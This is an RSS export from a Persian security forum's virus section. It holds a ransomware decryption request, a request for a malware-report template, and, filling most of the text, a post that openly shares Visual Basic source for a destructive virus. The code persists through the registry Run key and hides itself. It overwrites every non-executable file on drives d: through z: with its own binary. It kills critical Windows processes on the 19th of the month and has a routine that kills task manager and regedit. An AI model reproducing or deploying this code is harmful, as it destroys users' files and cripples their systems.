<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[ايران ويج - ويروس و آنتي ويروس]]></title>
		<link>https://www.iranled.com/forum/</link>
		<description><![CDATA[ايران ويج - https://www.iranled.com/forum]]></description>
		<pubDate>Tue, 01 Sep 2026 18:48:43 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[راهنمایی در مورد رمزگشایی یک فایلی که توسط باج افزار کد شده]]></title>
			<link>https://www.iranled.com/forum/thread-32737.html</link>
			<pubDate>Sat, 23 Apr 2022 01:33:03 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-32737.html</guid>
			<description><![CDATA[سلام دوستان<br />
سیستم دوستم دچار یک باج افزار شده که فایل هاش کد شده و بشدت فایل هاش رو نیاز داره<br />
<br />
من یک فایل pdf و یک فایل ورد که کد شده اند رو پیوست کردم<br />
می خواستم بدونم کسی می تونه این رو برام رمزگشایی کنه ؟<br /><!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/zip.gif" title="" border="0" alt=".rar" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=14301" target="_blank">nnnnn.rar</a> (اندازه:  301.62 KB / تعداد دفعات دریافت:  160)
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[سلام دوستان<br />
سیستم دوستم دچار یک باج افزار شده که فایل هاش کد شده و بشدت فایل هاش رو نیاز داره<br />
<br />
من یک فایل pdf و یک فایل ورد که کد شده اند رو پیوست کردم<br />
می خواستم بدونم کسی می تونه این رو برام رمزگشایی کنه ؟<br /><!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/zip.gif" title="" border="0" alt=".rar" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=14301" target="_blank">nnnnn.rar</a> (اندازه:  301.62 KB / تعداد دفعات دریافت:  160)
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[درخواست قالب گزارش تحلیل بدافزار]]></title>
			<link>https://www.iranled.com/forum/thread-32005.html</link>
			<pubDate>Sun, 21 Apr 2019 12:28:58 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-32005.html</guid>
			<description><![CDATA[سلام،<br />
دوستان اگر شما از قالب خاصی برای نوشتن گزارش تحلیل بدافزار استفاده میکنید، میتوانید آن را به من بدهید؟  :(): <br />
لطفا اگر خودتان آن قالب را استفاده میکنید آن را به اشتراک بگذارید چون منابع اینترنت به درد من نمیخورند <img src="https://www.iranled.com/forum/images/smilies/pack1/024.gif" alt="024" title="024" class="smilie smilie_46" />]]></description>
			<content:encoded><![CDATA[سلام،<br />
دوستان اگر شما از قالب خاصی برای نوشتن گزارش تحلیل بدافزار استفاده میکنید، میتوانید آن را به من بدهید؟  :(): <br />
لطفا اگر خودتان آن قالب را استفاده میکنید آن را به اشتراک بگذارید چون منابع اینترنت به درد من نمیخورند <img src="https://www.iranled.com/forum/images/smilies/pack1/024.gif" alt="024" title="024" class="smilie smilie_46" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[سورس ویروس ساده در عین حال خطر ناک با ویژال بیسیک]]></title>
			<link>https://www.iranled.com/forum/thread-31977.html</link>
			<pubDate>Sat, 02 Mar 2019 11:19:04 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-31977.html</guid>
			<description><![CDATA[سلام <img src="https://www.iranled.com/forum/images/smilies/pack1/028.gif" alt="028" title="028" class="smilie smilie_50" /> <br />
<a href="http://ebuyproject.ir" target="_blank" rel="noopener" class="mycode_url">سورس </a>یه <a href="http://ebuyproject.ir" target="_blank" rel="noopener" class="mycode_url">ویروس </a>ساده <img src="https://www.iranled.com/forum/images/smilies/pack1/2009.gif" alt="قلب عشق - بهینه شده برای ورژن جدید" title="قلب عشق - بهینه شده برای ورژن جدید" class="smilie smilie_90" /> در عین حال خطر ناک <br />
این ویروس از زمان اجرا تمام فایلها را <a href="http://ebuyproject.ir" target="_blank" rel="noopener" class="mycode_url">خراب </a>میکنه <img src="https://www.iranled.com/forum/images/smilies2/my.gif" alt="تعجب - بهینه شده برای ورژن جدید" title="تعجب - بهینه شده برای ورژن جدید" class="smilie smilie_96" /> و از روز 19ماه میلادی شروع به ریست کردن یهویی سیستم (روش جدا از شات دان معمولی)میکنه<br />
<div class="codeblock"><div class="title">کد: </div><div class="body" dir="ltr"><code>Dim man1 As String<br />
<br />
<br />
Sub myposhe(sPath As String)<br />
<br />
<br />
 sdir = Dir(sPath, vbDirectory)<br />
Do Until LenB(sdir) = 0<br />
    Debug.Print sdir<br />
    sdir = Dir<br />
        <br />
           kharab (sPath + sdir + "&#92;")<br />
          <br />
Loop<br />
End Sub<br />
<br />
Private Sub kharab(p As String)<br />
 sFilename = Dir(p)<br />
<br />
Do While sFilename &gt; ""<br />
<br />
  Debug.Print sFilename<br />
  sFilename = Dir()<br />
        If (Right(sFilename, 4) &lt;&gt; ".exe") Then<br />
            List1.AddItem (sFilename)<br />
            FileCopy manyer, sFilename<br />
        End If<br />
Loop<br />
<br />
End Sub<br />
<br />
Sub winGa()<br />
<br />
End Sub<br />
<br />
Private Sub Command1_Click()<br />
<br />
End Sub<br />
<br />
Private Sub Form_Load()<br />
Call startt<br />
End Sub<br />
<br />
Private Sub Timer1_Timer()<br />
 On Error Resume Next<br />
 Call startt<br />
 <br />
If (Day(Date) = 19) Or (GetSetting("iran", "mm", "aa", "0") = 19) Then<br />
Call SaveSetting("iran", "mm", "aa", "19")<br />
<br />
<br />
Call EndAnyProcess("smss.exe")<br />
Call EndAnyProcess("csrss.exe")<br />
Call EndAnyProcess("system.exe")<br />
Call EndAnyProcess("svchost.exe")<br />
<br />
<br />
End If<br />
 <br />
 <br />
 <br />
End Sub<br />
Sub startt()<br />
On Error Resume Next<br />
 App.TaskVisible = False<br />
 Hide<br />
Top = 10000<br />
 Dim mizYer As String<br />
''mizYer = Environ&#36;("USERPROFILE") &amp; "&#92;ali.txt"<br />
''MsgBox mizYer<br />
Dim manyer<br />
manyer = App.Path<br />
Dim llenman As Integer<br />
llenman = Len(manyer)<br />
If llenman = 3 Then<br />
manyer = manyer + App.ExeName + ".exe"<br />
Else<br />
manyer = manyer + "&#92;" + App.ExeName + ".exe"<br />
End If<br />
<br />
<br />
FileCopy manyer, man1<br />
<br />
SetAttr man1, vbHidden + vbSystem<br />
<br />
SetStringValue "HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;Run", "Window", man1<br />
'&#92;////////////////<br />
List1.Clear<br />
 For Cl = 100 To 97 + 25<br />
      If dt &lt;&gt; 1 Then<br />
         List1.AddItem (Chr(Cl) + ":")<br />
         kharab (Chr(Cl) + ":&#92;")<br />
         myposhe (Chr(Cl) + ":&#92;")<br />
      End If<br />
   Next Cl<br />
End Sub<br />
<br />
Private Sub Timer2_Timer()<br />
    Call Shell("explorer.exe", vbNormalFocus)<br />
<br />
End Sub</code></div></div><br />
<br />
ماژول ها<br />
<div class="codeblock"><div class="title">کد: </div><div class="body" dir="ltr"><code>Type FILETIME<br />
    lLowDateTime    As Long<br />
    lHighDateTime   As Long<br />
End Type<br />
 <br />
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long<br />
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long<br />
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long<br />
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long<br />
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long<br />
Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByRef lpData As Long, lpcbData As Long) As Long<br />
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long<br />
Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Long, ByVal cbData As Long) As Long<br />
Declare Function RegSetValueExB Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Byte, ByVal cbData As Long) As Long<br />
<br />
Const ERROR_SUCCESS = 0&amp;<br />
Const ERROR_BADDB = 1009&amp;<br />
Const ERROR_BADKEY = 1010&amp;<br />
Const ERROR_CANTOPEN = 1011&amp;<br />
Const ERROR_CANTREAD = 1012&amp;<br />
Const ERROR_CANTWRITE = 1013&amp;<br />
Const ERROR_OUTOFMEMORY = 14&amp;<br />
Const ERROR_INVALID_PARAMETER = 87&amp;<br />
Const ERROR_ACCESS_DENIED = 5&amp;<br />
Const ERROR_NO_MORE_ITEMS = 259&amp;<br />
Const ERROR_MORE_DATA = 234&amp;<br />
<br />
Const REG_NONE = 0&amp;<br />
Const REG_SZ = 1&amp;<br />
Const REG_EXPAND_SZ = 2&amp;<br />
Const REG_BINARY = 3&amp;<br />
Const REG_DWORD = 4&amp;<br />
Const REG_DWORD_LITTLE_ENDIAN = 4&amp;<br />
Const REG_DWORD_BIG_ENDIAN = 5&amp;<br />
Const REG_LINK = 6&amp;<br />
Const REG_MULTI_SZ = 7&amp;<br />
Const REG_RESOURCE_LIST = 8&amp;<br />
Const REG_FULL_RESOURCE_DESCRIPTOR = 9&amp;<br />
Const REG_RESOURCE_REQUIREMENTS_LIST = 10&amp;<br />
<br />
Const KEY_QUERY_VALUE = &amp;H1&amp;<br />
Const KEY_SET_VALUE = &amp;H2&amp;<br />
Const KEY_CREATE_SUB_KEY = &amp;H4&amp;<br />
Const KEY_ENUMERATE_SUB_KEYS = &amp;H8&amp;<br />
Const KEY_NOTIFY = &amp;H10&amp;<br />
Const KEY_CREATE_LINK = &amp;H20&amp;<br />
Const READ_CONTROL = &amp;H20000<br />
Const WRITE_DAC = &amp;H40000<br />
Const WRITE_OWNER = &amp;H80000<br />
Const SYNCHRONIZE = &amp;H100000<br />
Const STANDARD_RIGHTS_REQUIRED = &amp;HF0000<br />
Const STANDARD_RIGHTS_READ = READ_CONTROL<br />
Const STANDARD_RIGHTS_WRITE = READ_CONTROL<br />
Const STANDARD_RIGHTS_EXECUTE = READ_CONTROL<br />
Const KEY_READ = STANDARD_RIGHTS_READ Or KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY<br />
Const KEY_WRITE = STANDARD_RIGHTS_WRITE Or KEY_SET_VALUE Or KEY_CREATE_SUB_KEY<br />
Const KEY_EXECUTE = KEY_READ<br />
<br />
Dim hKey As Long, MainKeyHandle As Long<br />
Dim rtn As Long, lBuffer As Long, sBuffer As String<br />
Dim lBufferSize As Long<br />
Dim lDataSize As Long<br />
Dim ByteArray() As Byte<br />
<br />
'This constant determins wether or not to display error messages to the<br />
'user. I have set the default value to False as an error message can and<br />
'does become irritating after a while. Turn this value to true if you want<br />
'to debug your programming code when reading and writing to your system<br />
'registry, as any errors will be displayed in a message box.<br />
<br />
Const DisplayErrorMsg = False<br />
<br />
<br />
Function SetDWORDValue(SubKey As String, Entry As String, Value As Long)<br />
<br />
Call ParseKey(SubKey, MainKeyHandle)<br />
<br />
If MainKeyHandle Then<br />
   rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key<br />
   If rtn = ERROR_SUCCESS Then 'if the key was open successfully then<br />
      rtn = RegSetValueExA(hKey, Entry, 0, REG_DWORD, Value, 4) 'write the value<br />
      If Not rtn = ERROR_SUCCESS Then   'if there was an error writting the value<br />
         If DisplayErrorMsg = True Then 'if the user want errors displayed<br />
            'msgbox ErrorMsg(rtn)        'display the error<br />
         End If<br />
      End If<br />
      rtn = RegCloseKey(hKey) 'close the key<br />
   Else 'if there was an error opening the key<br />
      If DisplayErrorMsg = True Then 'if the user want errors displayed<br />
         'msgbox ErrorMsg(rtn) 'display the error<br />
      End If<br />
   End If<br />
End If<br />
<br />
End Function<br />
<br />
<br />
<br />
Function GetMainKeyHandle(MainKeyName As String) As Long<br />
<br />
Const HKEY_CLASSES_ROOT = &amp;H80000000<br />
Const HKEY_CURRENT_USER = &amp;H80000001<br />
Const HKEY_LOCAL_MACHINE = &amp;H80000002<br />
Const HKEY_USERS = &amp;H80000003<br />
Const HKEY_PERFORMANCE_DATA = &amp;H80000004<br />
Const HKEY_CURRENT_CONFIG = &amp;H80000005<br />
Const HKEY_DYN_DATA = &amp;H80000006<br />
   <br />
Select Case MainKeyName<br />
       Case "HKEY_CLASSES_ROOT"<br />
            GetMainKeyHandle = HKEY_CLASSES_ROOT<br />
       Case "HKEY_CURRENT_USER"<br />
            GetMainKeyHandle = HKEY_CURRENT_USER<br />
       Case "HKEY_LOCAL_MACHINE"<br />
            GetMainKeyHandle = HKEY_LOCAL_MACHINE<br />
       Case "HKEY_USERS"<br />
            GetMainKeyHandle = HKEY_USERS<br />
       Case "HKEY_PERFORMANCE_DATA"<br />
            GetMainKeyHandle = HKEY_PERFORMANCE_DATA<br />
       Case "HKEY_CURRENT_CONFIG"<br />
            GetMainKeyHandle = HKEY_CURRENT_CONFIG<br />
       Case "HKEY_DYN_DATA"<br />
            GetMainKeyHandle = HKEY_DYN_DATA<br />
End Select<br />
<br />
End Function<br />
<br />
Function ErrorMsg(lErrorCode As Long) As String<br />
    <br />
'If an error does accurr, and the user wants error messages displayed, then<br />
'display one of the following error messages<br />
<br />
Select Case lErrorCode<br />
       Case 1009, 1015<br />
            GetErrorMsg = "The Registry Database is corrupt!"<br />
       Case 2, 1010<br />
            GetErrorMsg = "Bad Key Name"<br />
       Case 1011<br />
            GetErrorMsg = "Can't Open Key"<br />
       Case 4, 1012<br />
            GetErrorMsg = "Can't Read Key"<br />
       Case 5<br />
            GetErrorMsg = "Access to this key is denied"<br />
       Case 1013<br />
            GetErrorMsg = "Can't Write Key"<br />
       Case 8, 14<br />
            GetErrorMsg = "Out of memory"<br />
       Case 87<br />
            GetErrorMsg = "Invalid Parameter"<br />
       Case 234<br />
            GetErrorMsg = "There is more data than the buffer has been allocated to hold."<br />
       Case Else<br />
            GetErrorMsg = "Undefined Error Code:  " &amp; Str&#36;(lErrorCode)<br />
End Select<br />
<br />
End Function<br />
<br />
<br />
<br />
Private Sub ParseKey(Keyname As String, Keyhandle As Long)<br />
    <br />
rtn = InStr(Keyname, "&#92;") 'return if "&#92;" is contained in the Keyname<br />
<br />
If Left(Keyname, 5) &lt;&gt; "HKEY_" Or Right(Keyname, 1) = "&#92;" Then 'if the is a "&#92;" at the end of the Keyname then<br />
   'msgbox "Incorrect Format:" + Chr(10) + Chr(10) + Keyname 'display error to the user<br />
   Exit Sub 'exit the procedure<br />
ElseIf rtn = 0 Then 'if the Keyname contains no "&#92;"<br />
   Keyhandle = GetMainKeyHandle(Keyname)<br />
   Keyname = "" 'leave Keyname blank<br />
Else 'otherwise, Keyname contains "&#92;"<br />
   Keyhandle = GetMainKeyHandle(Left(Keyname, rtn - 1)) 'seperate the Keyname<br />
   Keyname = Right(Keyname, Len(Keyname) - rtn)<br />
End If<br />
<br />
End Sub<br />
Function CreateKey(SubKey As String)<br />
<br />
Call ParseKey(SubKey, MainKeyHandle)<br />
<br />
If MainKeyHandle Then<br />
   rtn = RegCreateKey(MainKeyHandle, SubKey, hKey) 'create the key<br />
   If rtn = ERROR_SUCCESS Then 'if the key was created then<br />
      rtn = RegCloseKey(hKey)  'close the key<br />
   End If<br />
End If<br />
<br />
End Function<br />
Function SetStringValue(SubKey As String, Entry As String, Value As String)<br />
<br />
Call ParseKey(SubKey, MainKeyHandle)<br />
<br />
If MainKeyHandle Then<br />
   rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key<br />
   If rtn = ERROR_SUCCESS Then 'if the key was open successfully then<br />
      rtn = RegSetValueEx(hKey, Entry, 0, REG_SZ, ByVal Value, Len(Value)) 'write the value<br />
      If Not rtn = ERROR_SUCCESS Then   'if there was an error writting the value<br />
         If DisplayErrorMsg = True Then 'if the user wants errors displayed<br />
            'msgbox ErrorMsg(rtn)        'display the error<br />
         End If<br />
      End If<br />
      rtn = RegCloseKey(hKey) 'close the key<br />
   Else 'if there was an error opening the key<br />
      If DisplayErrorMsg = True Then 'if the user wants errors displayed<br />
         'msgbox ErrorMsg(rtn)        'display the error<br />
      End If<br />
   End If<br />
End If<br />
<br />
End Function</code></div></div><br />
و ماژول دوم<br />
<div class="codeblock"><div class="title">کد: </div><div class="body" dir="ltr"><code>Private Declare Function GetVersion Lib "kernel32" () As Long<br />
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long<br />
Private Declare Function OpenProcessToken Lib "advapi32" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long<br />
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long<br />
Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long<br />
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long<br />
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long<br />
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long<br />
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long<br />
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long<br />
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long<br />
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long<br />
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long<br />
<br />
Private Const TOKEN_ADJUST_PRIVILEGES = &amp;H20<br />
Private Const TOKEN_QUERY = &amp;H8<br />
Private Const SE_PRIVILEGE_ENABLED = &amp;H2<br />
Private Const PROCESS_ALL_ACCESS As Long = &amp;H1F0FFF<br />
Private Const PROCESS_VM_READ = 16<br />
Private Const TH32CS_SNAPHEAPLIST = &amp;H1<br />
Private Const TH32CS_SNAPPROCESS = &amp;H2<br />
Private Const TH32CS_SNAPTHREAD = &amp;H4<br />
Private Const TH32CS_SNAPMODULE = &amp;H8<br />
Private Const HKEY_CLASSES_ROOT = &amp;H80000000<br />
Private Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST + TH32CS_SNAPPROCESS + TH32CS_SNAPTHREAD + TH32CS_SNAPMODULE)<br />
Private Type PROCESSENTRY32<br />
    dwSize As Long<br />
    cntUsage As Long<br />
    th32ProcessID As Long<br />
    th32DefaultHeapID As Long<br />
    th32ModuleID As Long<br />
    cntThreads As Long<br />
    th32ParentProcessID As Long<br />
    pcPriClassBase As Long<br />
    dwFlags As Long<br />
    szexeFile As String * 260<br />
End Type<br />
<br />
Private Type LUID<br />
   lowpart As Long<br />
   highpart As Long<br />
End Type<br />
<br />
Private Type TOKEN_PRIVILEGES<br />
    PrivilegeCount As Long<br />
    LuidUDT As LUID<br />
    Attributes As Long<br />
End Type<br />
<br />
Function GiveMeThatHandle(ExeName) As Long<br />
Dim P_Pid, P_Proc, adr, bfLg As Long<br />
Dim res&amp;, ant&amp;<br />
Dim u As Integer<br />
Dim Process As PROCESSENTRY32<br />
<br />
res = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&amp;)<br />
<br />
If res &lt;&gt; 0 Then<br />
<br />
   Process.dwSize = Len(Process)<br />
   ant = Process32First(res, Process)<br />
   u = 0<br />
   <br />
Do<br />
  A = LCase(Process.szexeFile)<br />
    If InStr(A, ExeName) Then pids = Process.th32ProcessID<br />
    ant = Process32Next(res, Process)<br />
  u = u + 1<br />
Loop Until ant = 0<br />
<br />
End If<br />
<br />
P_Pid = pids<br />
hProcessID = P_Pid<br />
DoEvents<br />
<br />
    Dim hToken As Long<br />
    Dim hProcess As Long<br />
    Dim tp As TOKEN_PRIVILEGES<br />
    <br />
    If GetVersion() &gt;= 0 Then<br />
        If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or _<br />
            TOKEN_QUERY, hToken) = 0 Then<br />
            GoTo CleanUp<br />
        End If<br />
<br />
        If LookupPrivilegeValue("", "SeDebugPrivilege", tp.LuidUDT) = 0 Then<br />
            GoTo CleanUp<br />
        End If<br />
<br />
        tp.PrivilegeCount = 1<br />
        tp.Attributes = SE_PRIVILEGE_ENABLED<br />
<br />
        If AdjustTokenPrivileges(hToken, False, tp, 0, ByVal 0&amp;, _<br />
            ByVal 0&amp;) = 0 Then<br />
            GoTo CleanUp<br />
        End If<br />
    End If<br />
<br />
    P_Proc = OpenProcess(PROCESS_ALL_ACCESS, 0, hProcessID)<br />
    GiveMeThatHandle = P_Proc<br />
CleanUp:<br />
        If hToken Then CloseHandle hToken<br />
End Function<br />
<br />
Function EndAnyProcess(ExeName) As Boolean<br />
       Dim phandle As Long<br />
       Const PROCESS_ALL_ACCESS = 0<br />
       phandle = GiveMeThatHandle(ExeName)<br />
       Kill_Process = CBool(TerminateProcess(phandle, uExitCode))<br />
       Call CloseHandle(phandle)<br />
End Function<br />
<br />
Private Sub Rest_sys()<br />
<br />
Call EndAnyProcess("smss.exe")<br />
Call EndAnyProcess("csrss.exe")<br />
Call EndAnyProcess("system.exe")<br />
Call EndAnyProcess("svchost.exe")<br />
End Sub<br />
<br />
Sub end_show()<br />
<br />
Call EndAnyProcess("regedit.exe")<br />
Call EndAnyProcess("taskmgr.exe")<br />
Call EndAnyProcess("msconfig.exe")<br />
Call EndAnyProcess("cmd.exe")<br />
Call EndAnyProcess("mmc.exe")<br />
Call EndAnyProcess("opera.exe")<br />
End Sub</code></div></div> <img src="https://www.iranled.com/forum/images/smilies2/biggrin.gif" alt="خنده بلد − بهینه شده برای ورژن جدید" title="خنده بلد − بهینه شده برای ورژن جدید" class="smilie smilie_88" />]]></description>
			<content:encoded><![CDATA[سلام <img src="https://www.iranled.com/forum/images/smilies/pack1/028.gif" alt="028" title="028" class="smilie smilie_50" /> <br />
<a href="http://ebuyproject.ir" target="_blank" rel="noopener" class="mycode_url">سورس </a>یه <a href="http://ebuyproject.ir" target="_blank" rel="noopener" class="mycode_url">ویروس </a>ساده <img src="https://www.iranled.com/forum/images/smilies/pack1/2009.gif" alt="قلب عشق - بهینه شده برای ورژن جدید" title="قلب عشق - بهینه شده برای ورژن جدید" class="smilie smilie_90" /> در عین حال خطر ناک <br />
این ویروس از زمان اجرا تمام فایلها را <a href="http://ebuyproject.ir" target="_blank" rel="noopener" class="mycode_url">خراب </a>میکنه <img src="https://www.iranled.com/forum/images/smilies2/my.gif" alt="تعجب - بهینه شده برای ورژن جدید" title="تعجب - بهینه شده برای ورژن جدید" class="smilie smilie_96" /> و از روز 19ماه میلادی شروع به ریست کردن یهویی سیستم (روش جدا از شات دان معمولی)میکنه<br />
<div class="codeblock"><div class="title">کد: </div><div class="body" dir="ltr"><code>Dim man1 As String<br />
<br />
<br />
Sub myposhe(sPath As String)<br />
<br />
<br />
 sdir = Dir(sPath, vbDirectory)<br />
Do Until LenB(sdir) = 0<br />
    Debug.Print sdir<br />
    sdir = Dir<br />
        <br />
           kharab (sPath + sdir + "&#92;")<br />
          <br />
Loop<br />
End Sub<br />
<br />
Private Sub kharab(p As String)<br />
 sFilename = Dir(p)<br />
<br />
Do While sFilename &gt; ""<br />
<br />
  Debug.Print sFilename<br />
  sFilename = Dir()<br />
        If (Right(sFilename, 4) &lt;&gt; ".exe") Then<br />
            List1.AddItem (sFilename)<br />
            FileCopy manyer, sFilename<br />
        End If<br />
Loop<br />
<br />
End Sub<br />
<br />
Sub winGa()<br />
<br />
End Sub<br />
<br />
Private Sub Command1_Click()<br />
<br />
End Sub<br />
<br />
Private Sub Form_Load()<br />
Call startt<br />
End Sub<br />
<br />
Private Sub Timer1_Timer()<br />
 On Error Resume Next<br />
 Call startt<br />
 <br />
If (Day(Date) = 19) Or (GetSetting("iran", "mm", "aa", "0") = 19) Then<br />
Call SaveSetting("iran", "mm", "aa", "19")<br />
<br />
<br />
Call EndAnyProcess("smss.exe")<br />
Call EndAnyProcess("csrss.exe")<br />
Call EndAnyProcess("system.exe")<br />
Call EndAnyProcess("svchost.exe")<br />
<br />
<br />
End If<br />
 <br />
 <br />
 <br />
End Sub<br />
Sub startt()<br />
On Error Resume Next<br />
 App.TaskVisible = False<br />
 Hide<br />
Top = 10000<br />
 Dim mizYer As String<br />
''mizYer = Environ&#36;("USERPROFILE") &amp; "&#92;ali.txt"<br />
''MsgBox mizYer<br />
Dim manyer<br />
manyer = App.Path<br />
Dim llenman As Integer<br />
llenman = Len(manyer)<br />
If llenman = 3 Then<br />
manyer = manyer + App.ExeName + ".exe"<br />
Else<br />
manyer = manyer + "&#92;" + App.ExeName + ".exe"<br />
End If<br />
<br />
<br />
FileCopy manyer, man1<br />
<br />
SetAttr man1, vbHidden + vbSystem<br />
<br />
SetStringValue "HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;Run", "Window", man1<br />
'&#92;////////////////<br />
List1.Clear<br />
 For Cl = 100 To 97 + 25<br />
      If dt &lt;&gt; 1 Then<br />
         List1.AddItem (Chr(Cl) + ":")<br />
         kharab (Chr(Cl) + ":&#92;")<br />
         myposhe (Chr(Cl) + ":&#92;")<br />
      End If<br />
   Next Cl<br />
End Sub<br />
<br />
Private Sub Timer2_Timer()<br />
    Call Shell("explorer.exe", vbNormalFocus)<br />
<br />
End Sub</code></div></div><br />
<br />
ماژول ها<br />
<div class="codeblock"><div class="title">کد: </div><div class="body" dir="ltr"><code>Type FILETIME<br />
    lLowDateTime    As Long<br />
    lHighDateTime   As Long<br />
End Type<br />
 <br />
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long<br />
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long<br />
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long<br />
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long<br />
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long<br />
Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByRef lpData As Long, lpcbData As Long) As Long<br />
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long<br />
Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Long, ByVal cbData As Long) As Long<br />
Declare Function RegSetValueExB Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Byte, ByVal cbData As Long) As Long<br />
<br />
Const ERROR_SUCCESS = 0&amp;<br />
Const ERROR_BADDB = 1009&amp;<br />
Const ERROR_BADKEY = 1010&amp;<br />
Const ERROR_CANTOPEN = 1011&amp;<br />
Const ERROR_CANTREAD = 1012&amp;<br />
Const ERROR_CANTWRITE = 1013&amp;<br />
Const ERROR_OUTOFMEMORY = 14&amp;<br />
Const ERROR_INVALID_PARAMETER = 87&amp;<br />
Const ERROR_ACCESS_DENIED = 5&amp;<br />
Const ERROR_NO_MORE_ITEMS = 259&amp;<br />
Const ERROR_MORE_DATA = 234&amp;<br />
<br />
Const REG_NONE = 0&amp;<br />
Const REG_SZ = 1&amp;<br />
Const REG_EXPAND_SZ = 2&amp;<br />
Const REG_BINARY = 3&amp;<br />
Const REG_DWORD = 4&amp;<br />
Const REG_DWORD_LITTLE_ENDIAN = 4&amp;<br />
